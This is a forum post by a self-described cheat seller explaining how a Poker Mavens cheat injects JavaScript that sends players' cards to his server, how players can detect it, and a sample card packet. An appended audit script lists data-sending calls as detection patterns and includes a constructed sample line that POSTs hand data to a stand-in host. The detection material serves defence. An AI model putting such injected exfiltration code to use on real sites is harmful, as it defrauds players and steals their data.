Hello,
Allow me to introduce myself, although this is an unfortunate event, to provide some authenticity: I am a young developer who has a history of developing (and reverse engineering) software, games, and auto-traders (for the forex/crypto market). (You can search up some of my other forum posts and sales on Google via my username, as this is not a self-advertising post but rather an informative one.)
Some small context I would have to state is that the person was dealt a trial version of the patched Poker Mavens cheat, he never obtained the full cheat as he did not finish his payments. I'm assuming he went online searching for people to sell this cheat to fund his own (while making money I see), as the $10k price tag was indeed above the limits for a simple card showing trick.
Although I do understand your concern, do note that I was able to get that price tag from the following post:
Please note that I am the one from Lebanon, I am not sure of what his nationality is, or whether he is from the same country or not, I do hope it was not identity theft as stated in my email.
These words are indeed real and accurate, and I could not have said better otherwise. I will explain the hack provided and used by fellows among the community and ways to detect the cheating.
Although this may or may not be possible (subject for research), the person who had access to my trial version of the cheat was not able to do so (the reason is going to be stated below). Unless he was able to obtain a different cheat from elsewhere, I highly doubt clientside users can access such data beforehand. I did tell him I would try to exploit it for an extra fee, though.
Now that certain things are cleared, I'd like to explain how to detect the vulnerability from the cheat (in case he had resold it to someone else) as he had violated the code of conduct that is supposed to be respected by both parties.
Before I do so, I'd like to state that Poker Mavens is indeed secure. It was not as easy as other poker software I've gone through, hence I went with a different approach: this one required me to reverse engineer the JavaScript code on the client side to make a user send the content to someone else.
In other words, what the hack does is change the code on each person opening Poker Mavens' browser page, like somewhat a 'spyware' in English, that checks what cards you received, then sends them to my server.
After listening to PFA's radio, I've seen that Dan stated that Kent did not provide a way to know whether the webserver is infected as a client, although his quotation above does, but not in a visible manner.
First, press Ctrl+Shift+I on Google Chrome, which will bring up the developer console. Press Sources, and select the JavaScript file that contains the PokerMinJs JavaScript code.
Press Ctrl+F to search, and type in 'ajax'. This serves to POST/GET content to the server. Note that other cheats may use a different method of intercepting and posting, but that was the one in my case.
If you can find any $.ajax inside the code, do NOT play on that poker site, as it sends data to the owner on the hand of cards you own.
Please note that PokerMavens is still on the safer end of other poker software out there, and fortunately, most cheats relating to that software are discoverable by the client. I am not saying it is entirely secure as such a thing does not exist, yet it is on the safer side.
As Kent had stated, if the owner wants to cheat his clients, he WILL find a way to do so. Please do not trust any poker website by its software (even those that are using very expensive software; some were easier to hack than PM itself). I respect this guy's code and ethics on not providing the card showing feature upon a client's request. (By making a good reputation out of his software and himself, and more work to fellow cheat developers like me... just kidding.) Any exposed cheat of mine that goes to ruin the reputation of the software/game will get exposed for fixing, as I do not intend to destroy any person's business on the bricks of building my own.
I'd also like to state that this is not the only way to expose cheats as lots of clients do not load the JS code in such a way, ALL poker software is vulnerable to packet sniffing and memory dump attacks. Some are more secure than others, but the concept is still the same. In the most extreme cases, you can send a replica of your screen to the attacker, making the superuser see what you can see on the table. (this works on almost all online web-based software)
In PM's case, the data was very well secured from packet intercepting as well, making my job slightly harder:
It does seem he had taken extra precaution on the sniffers, you can always decrypt it with the provided salt, but you'll not be able to intercept them mid-session as it uses the WebSocket's Seed as another key (which makes packet sniffers less effective in Poker Mavens).

Command: "ECards"
Table: "Ring Game #01"
Type: "R"
Salt: "02B18FA165BF3C2F"
Hand: "22-1"
Card1: "2C"
Card2: "98"
Card3: "64"
Card4: "0A"
Card5: "9A"
Show: "No"
How could Kent fix this? Several ways: one of the common ways is to double-check the JS file's hash before posting it on the server; another would be to check the hash of the whole program to prevent its tampering. But I deem this as useless because a hacker will always find a way to hack in ANY way possible. I suggest only playing poker in trusted real-life casinos, and not through the screen of your computer unless you completely trust the person hosting.
Do not hesitate to ask any questions regarding this or any other related topic.
Stay safe!
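
The two checks the post describes (comparing the served script's hash with a known-good one, and searching the script for calls that can send data out) can be scripted; the following is an added example, not code from the post's author or from Poker Mavens. It assumes a known-good SHA-256 is available from a trusted source, the sample scripts and the `collector.example` host are constructed, and the list of calls goes beyond `$.ajax` because the post notes other cheats may use a different method.

```javascript
// Added example: audit a client script saved from the browser's Sources tab.
const crypto = require('node:crypto');

// Calls that can send data off the page. The post names $.ajax; the others
// are common equivalents (assumption: this list is not exhaustive).
const SINKS = [
  { name: '$.ajax', re: /\$\.ajax\s*\(/g },
  { name: 'jQuery.ajax', re: /\bjQuery\.ajax\s*\(/g },
  { name: 'XMLHttpRequest', re: /\bnew\s+XMLHttpRequest\b/g },
  { name: 'fetch', re: /\bfetch\s*\(/g },
  { name: 'sendBeacon', re: /\bnavigator\.sendBeacon\s*\(/g },
  { name: 'WebSocket', re: /\bnew\s+WebSocket\s*\(/g },
];

function sha256Hex(text) {
  return crypto.createHash('sha256').update(text, 'utf8').digest('hex');
}

// expectedSinks: calls the legitimate client is known to use (hypothetical
// baseline; the post says the real client talks over a WebSocket).
function auditScript(source, knownGoodHash, expectedSinks = ['WebSocket']) {
  const findings = [];
  for (const { name, re } of SINKS) {
    for (const m of source.matchAll(re)) {
      const start = Math.max(0, m.index - 30);
      findings.push({ name, offset: m.index, context: source.slice(start, m.index + 50) });
    }
  }
  findings.sort((a, b) => a.offset - b.offset);
  return {
    hashMatches: sha256Hex(source) === knownGoodHash.toLowerCase(),
    findings,
    unexpected: findings.filter((f) => !expectedSinks.includes(f.name)),
  };
}

// Constructed samples: a clean script and the same script with an added call.
const CLEAN = 'var ws=new WebSocket(url);function deal(c){render(c);}';
const TAMPERED = CLEAN + '$.ajax({type:"POST",url:"https://collector.example/x",data:h});';
const KNOWN_GOOD = sha256Hex(CLEAN); // stand-in for a hash from a trusted source

for (const [label, src] of [['clean', CLEAN], ['tampered', TAMPERED]]) {
  const r = auditScript(src, KNOWN_GOOD);
  const names = r.unexpected.map((f) => f.name).join(',') || 'none';
  console.log(`${label}: hashMatches=${r.hashMatches} unexpected=${names}`);
}
```

A hash mismatch or an unexpected call is a reason to review the script, not proof of a cheat; a clean result does not rule out the other methods the post mentions.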